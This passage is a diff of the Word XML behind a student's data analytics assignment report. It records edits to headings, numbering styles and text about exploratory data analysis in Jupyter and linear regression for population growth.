+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve">This process will be performed on </w:t>
+      </w:r>
+      <w:proofErr w:type="spellStart"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>Jupyter</w:t>
+      </w:r>
+      <w:proofErr w:type="spellEnd"/>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> notebook:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:ind w:firstLine="720"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>MSC_DA_CA1_Jose_Mario</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t>.ipynb</w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+        <w:t># Fase 01 -  EDA:</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
+        <w:rPr>
+          <w:rFonts w:ascii="Times New Roman" w:eastAsia="Times New Roman" w:hAnsi="Times New Roman" w:cs="Times New Roman"/>
+          <w:sz w:val="24"/>
+          <w:szCs w:val="24"/>
+        </w:rPr>
+      </w:pPr>
     </w:p>
     <w:p>
       <w:pPr>
@@ -2156,6 +2463,7 @@
           <w:szCs w:val="24"/>
           <w:lang w:eastAsia="en-IE"/>
         </w:rPr>
+        <w:lastRenderedPageBreak/>
         <w:t>By identifying these insights, I can develop a better understanding of the data and choose the appropriate prediction method.</w:t>
       </w:r>
     </w:p>
@@ -2273,39 +2581,22 @@
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t xml:space="preserve"> We need to </w:t>
-      </w:r>
-      <w:proofErr w:type="gramStart"/>
-      <w:r>
+        <w:t xml:space="preserve"> We need to visualize,  clean, verify if is there any “bad data” (null or bad formatted data), and after merge these datasets.</w:t>
+      </w:r>
+    </w:p>
+    <w:p>
+      <w:pPr>
+        <w:pStyle w:val="ListParagraph"/>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>visualize,  clean</w:t>
-      </w:r>
-      <w:proofErr w:type="gramEnd"/>
+      </w:pPr>
       <w:r>
         <w:rPr>
           <w:sz w:val="28"/>
           <w:szCs w:val="28"/>
         </w:rPr>
-        <w:t>, verify if is there any “bad data” (null or bad formatted data), and after merge these datasets.</w:t>
-      </w:r>
-    </w:p>
-    <w:p>
-      <w:pPr>
-        <w:pStyle w:val="ListParagraph"/>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-      </w:pPr>
-      <w:r>
-        <w:rPr>
-          <w:sz w:val="28"/>
-          <w:szCs w:val="28"/>
-        </w:rPr>
-        <w:lastRenderedPageBreak/>
         <w:t xml:space="preserve">Analysing the dataset, we can see that the population is split into regions, </w:t>
       </w:r>
       <w:r>
@@ -4544,9 +4835,33 @@
     <w:p/>
     <w:p/>
     <w:p/>
+    <w:p>
+      <w:pPr>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+      </w:pPr>
+      <w:r>
+        <w:rPr>
+          <w:b/>
+          <w:bCs/>
+        </w:rPr>
+        <w:t>Machine Learning</w:t>
+      </w:r>
+    </w:p>
     <w:p/>
-    <w:p/>
-    <w:p/>
+    <w:p>
+      <w:r>
+        <w:rPr>
+          <w:rStyle w:val="Strong"/>
+        </w:rPr>
+        <w:t>Linear regression:</w:t>
+      </w:r>
+      <w:r>
+        <w:t xml:space="preserve"> Linear regression is a simple but powerful model that can be used to predict continuous variables, such as population growth. It works by finding a linear relationship between the population growth and one or more independent variables, such as fertility rates, mortality rates, and migration rates.</w:t>
+      </w:r>
+    </w:p>
     <w:p/>
     <w:p/>
     <w:sectPr>
@@ -4806,6 +5121,95 @@
     </w:lvl>
   </w:abstractNum>
   <w:abstractNum w:abstractNumId="2" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="3CC628F4"/>
+    <w:multiLevelType w:val="hybridMultilevel"/>
+    <w:tmpl w:val="6EC03508"/>
+    <w:lvl w:ilvl="0" w:tplc="C41CDA5A">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%1."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1080" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:hint="default"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="1" w:tplc="18090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%2."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tplc="1809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%3."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="2520" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tplc="1809000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%4."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tplc="18090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%5."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="3960" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tplc="1809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%6."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="4680" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tplc="1809000F" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="decimal"/>
+      <w:lvlText w:val="%7."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tplc="18090019" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerLetter"/>
+      <w:lvlText w:val="%8."/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:ind w:left="6120" w:hanging="360"/>
+      </w:pPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tplc="1809001B" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="lowerRoman"/>
+      <w:lvlText w:val="%9."/>
+      <w:lvlJc w:val="right"/>
+      <w:pPr>
+        <w:ind w:left="6840" w:hanging="180"/>
+      </w:pPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="476E1581"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="76C603AC"/>
@@ -4927,7 +5331,7 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="3" w15:restartNumberingAfterBreak="0">
+  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
     <w:nsid w:val="4CFE6204"/>
     <w:multiLevelType w:val="multilevel"/>
     <w:tmpl w:val="08A06254"/>
@@ -4938,15 +5342,164 @@
       <w:lvlJc w:val="left"/>
       <w:pPr>
         <w:tabs>
-          <w:tab w:val="num" w:pos="720"/>
+          <w:tab w:val="num" w:pos="1080"/>
         </w:tabs>
-        <w:ind w:left="720" w:hanging="360"/>
+        <w:ind w:left="1080" w:hanging="360"/>
       </w:pPr>
       <w:rPr>
         <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
         <w:sz w:val="20"/>
       </w:rPr>
     </w:lvl>
+    <w:lvl w:ilvl="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val="o"/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="1800"/>
+        </w:tabs>
+        <w:ind w:left="1800" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="2" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="2520"/>
+        </w:tabs>
+        <w:ind w:left="2520" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="3" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3240"/>
+        </w:tabs>
+        <w:ind w:left="3240" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="4" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="3960"/>
+        </w:tabs>
+        <w:ind w:left="3960" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="5" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="4680"/>
+        </w:tabs>
+        <w:ind w:left="4680" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="6" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="5400"/>
+        </w:tabs>
+        <w:ind w:left="5400" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="7" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6120"/>
+        </w:tabs>
+        <w:ind w:left="6120" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+    <w:lvl w:ilvl="8" w:tentative="1">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="6840"/>
+        </w:tabs>
+        <w:ind w:left="6840" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
+  </w:abstractNum>
+  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="517C4A0B"/>
+    <w:multiLevelType w:val="multilevel"/>
+    <w:tmpl w:val="9B22E250"/>
+    <w:lvl w:ilvl="0">
+      <w:start w:val="1"/>
+      <w:numFmt w:val="bullet"/>
+      <w:lvlText w:val=""/>
+      <w:lvlJc w:val="left"/>
+      <w:pPr>
+        <w:tabs>
+          <w:tab w:val="num" w:pos="720"/>
+        </w:tabs>
+        <w:ind w:left="720" w:hanging="360"/>
+      </w:pPr>
+      <w:rPr>
+        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
+        <w:sz w:val="20"/>
+      </w:rPr>
+    </w:lvl>
     <w:lvl w:ilvl="1" w:tentative="1">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -5076,10 +5629,10 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="4" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="517C4A0B"/>
+  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="536E5AC0"/>
     <w:multiLevelType w:val="multilevel"/>
-    <w:tmpl w:val="9B22E250"/>
+    <w:tmpl w:val="8CDAEE96"/>
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -5225,10 +5778,10 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="5" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="536E5AC0"/>
+  <w:abstractNum w:abstractNumId="7" w15:restartNumberingAfterBreak="0">
+    <w:nsid w:val="725D2623"/>
     <w:multiLevelType w:val="multilevel"/>
-    <w:tmpl w:val="8CDAEE96"/>
+    <w:tmpl w:val="87A8D2E8"/>
     <w:lvl w:ilvl="0">
       <w:start w:val="1"/>
       <w:numFmt w:val="bullet"/>
@@ -5374,175 +5927,29 @@
       </w:rPr>
     </w:lvl>
   </w:abstractNum>
-  <w:abstractNum w:abstractNumId="6" w15:restartNumberingAfterBreak="0">
-    <w:nsid w:val="725D2623"/>
-    <w:multiLevelType w:val="multilevel"/>
-    <w:tmpl w:val="87A8D2E8"/>
-    <w:lvl w:ilvl="0">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="720"/>
-        </w:tabs>
-        <w:ind w:left="720" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Symbol" w:hAnsi="Symbol" w:hint="default"/>
-        <w:sz w:val="20"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl w:ilvl="1" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val="o"/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="1440"/>
-        </w:tabs>
-        <w:ind w:left="1440" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Courier New" w:hAnsi="Courier New" w:hint="default"/>
-        <w:sz w:val="20"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl w:ilvl="2" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="2160"/>
-        </w:tabs>
-        <w:ind w:left="2160" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
-        <w:sz w:val="20"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl w:ilvl="3" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="2880"/>
-        </w:tabs>
-        <w:ind w:left="2880" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
-        <w:sz w:val="20"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl w:ilvl="4" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="3600"/>
-        </w:tabs>
-        <w:ind w:left="3600" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
-        <w:sz w:val="20"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl w:ilvl="5" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="4320"/>
-        </w:tabs>
-        <w:ind w:left="4320" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
-        <w:sz w:val="20"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl w:ilvl="6" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="5040"/>
-        </w:tabs>
-        <w:ind w:left="5040" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
-        <w:sz w:val="20"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl w:ilvl="7" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="5760"/>
-        </w:tabs>
-        <w:ind w:left="5760" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
-        <w:sz w:val="20"/>
-      </w:rPr>
-    </w:lvl>
-    <w:lvl w:ilvl="8" w:tentative="1">
-      <w:start w:val="1"/>
-      <w:numFmt w:val="bullet"/>
-      <w:lvlText w:val=""/>
-      <w:lvlJc w:val="left"/>
-      <w:pPr>
-        <w:tabs>
-          <w:tab w:val="num" w:pos="6480"/>
-        </w:tabs>
-        <w:ind w:left="6480" w:hanging="360"/>
-      </w:pPr>
-      <w:rPr>
-        <w:rFonts w:ascii="Wingdings" w:hAnsi="Wingdings" w:hint="default"/>
-        <w:sz w:val="20"/>
-      </w:rPr>
-    </w:lvl>
-  </w:abstractNum>
   <w:num w:numId="1" w16cid:durableId="1760440869">
-    <w:abstractNumId w:val="4"/>
+    <w:abstractNumId w:val="5"/>
   </w:num>
   <w:num w:numId="2" w16cid:durableId="305356629">
-    <w:abstractNumId w:val="2"/>
+    <w:abstractNumId w:val="3"/>
   </w:num>
   <w:num w:numId="3" w16cid:durableId="1166743486">
     <w:abstractNumId w:val="0"/>
   </w:num>
   <w:num w:numId="4" w16cid:durableId="1173181685">
-    <w:abstractNumId w:val="3"/>
+    <w:abstractNumId w:val="4"/>
   </w:num>
   <w:num w:numId="5" w16cid:durableId="1246454614">
-    <w:abstractNumId w:val="6"/>
+    <w:abstractNumId w:val="7"/>
   </w:num>
   <w:num w:numId="6" w16cid:durableId="1393307185">
     <w:abstractNumId w:val="1"/>
   </w:num>
   <w:num w:numId="7" w16cid:durableId="1530295400">
-    <w:abstractNumId w:val="5"/>
+    <w:abstractNumId w:val="6"/>
+  </w:num>
+  <w:num w:numId="8" w16cid:durableId="2134978705">
+    <w:abstractNumId w:val="2"/>
   </w:num>
 </w:numbering>
 </file>
@@ -6166,6 +6573,11 @@
       <w:szCs w:val="24"/>
     </w:rPr>
   </w:style>
+  <w:style w:type="character" w:customStyle="1" w:styleId="hgkelc">
+    <w:name w:val="hgkelc"/>
+    <w:basedOn w:val="DefaultParagraphFont"/>
+    <w:rsid w:val="00084E49"/>
+  </w:style>
 </w:styles>
 </file>
 

--- a/MSC_DA_CA1_Jose_Mario.docx
+++ b/MSC_DA_CA1_Jose_Mario.docx
@@ -127,7 +127,13 @@
               <w:rPr>
                 <w:i/>
               </w:rPr>
-              <w:t>Programming for DA</w:t>
+              <w:t>Programming for D</w:t>
+            </w:r>
+            <w:r>
+              <w:rPr>
+                <w:i/>
+              </w:rPr>
+              <w:t>ata Analytics</w:t>
             </w:r>
           </w:p>
           <w:p>
@@ -1582,17 +1588,8 @@
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:lang w:val="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">Data </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t>Wrangling</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t>Data Wrangling</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:noProof/>
@@ -1654,58 +1651,40 @@
         </w:rPr>
         <w:t xml:space="preserve">1.2 </w:t>
       </w:r>
-      <w:proofErr w:type="spellStart"/>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:lang w:val="fr-FR"/>
         </w:rPr>
-        <w:t>Exploratory</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
+        <w:t xml:space="preserve">Exploratory </w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:lang w:val="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve"> </w:t>
+        <w:t>D</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:lang w:val="fr-FR"/>
         </w:rPr>
-        <w:t>D</w:t>
+        <w:t xml:space="preserve">ata </w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:lang w:val="fr-FR"/>
         </w:rPr>
-        <w:t xml:space="preserve">ata </w:t>
-      </w:r>
-      <w:proofErr w:type="spellStart"/>
+        <w:t>A</w:t>
+      </w:r>
       <w:r>
         <w:rPr>
           <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:lang w:val="fr-FR"/>
         </w:rPr>
-        <w:t>A</w:t>
-      </w:r>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t>nalysis</w:t>
-      </w:r>
-      <w:proofErr w:type="spellEnd"/>
-      <w:r>
-        <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve"> (EDA) Method and Insights</w:t>
+        <w:t>nalysis (EDA) Method and Insights</w:t>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1751,7 +1730,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="TOC2"/>
+        <w:pStyle w:val="TOC1"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -1762,14 +1741,27 @@
       </w:pPr>
       <w:r>
         <w:rPr>
-          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:noProof/>
-        </w:rPr>
-        <w:t>1.3 Requirements</w:t>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve">2.0 </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:i/>
+        </w:rPr>
+        <w:t>Statistics for Data Analytics</w:t>
       </w:r>
       <w:r>
         <w:rPr>
           <w:noProof/>
+          <w:lang w:val="fr-FR"/>
+        </w:rPr>
+        <w:t xml:space="preserve"> </w:t>
+      </w:r>
+      <w:r>
+        <w:rPr>
+          <w:noProof/>
         </w:rPr>
         <w:tab/>
       </w:r>
@@ -1783,7 +1775,7 @@
         <w:rPr>
           <w:noProof/>
         </w:rPr>
-        <w:instrText xml:space="preserve"> PAGEREF _Toc59959349 \h </w:instrText>
+        <w:instrText xml:space="preserve"> PAGEREF _Toc59959350 \h </w:instrText>
       </w:r>
       <w:r>
         <w:rPr>
@@ -1811,7 +1803,7 @@
     </w:p>
     <w:p>
       <w:pPr>
-        <w:pStyle w:val="TOC1"/>
+        <w:pStyle w:val="TOC2"/>
         <w:rPr>
           <w:rFonts w:asciiTheme="minorHAnsi" w:eastAsiaTheme="minorEastAsia" w:hAnsiTheme="minorHAnsi" w:cstheme="minorBidi"/>
           <w:noProof/>
@@ -1822,16 +1814,17 @@
       </w:pPr>
       <w:r>
         <w:rPr>
+          <w:rFonts w:ascii="Roboto Bold" w:hAnsi="Roboto Bold"/>
           <w:noProof/>
-          <w:lang w:val="fr-FR"/>
-        </w:rPr>
-        <w:t xml:space="preserve">2.0 Sample Report </w:t>
-      </w:r>
-      <w:r>
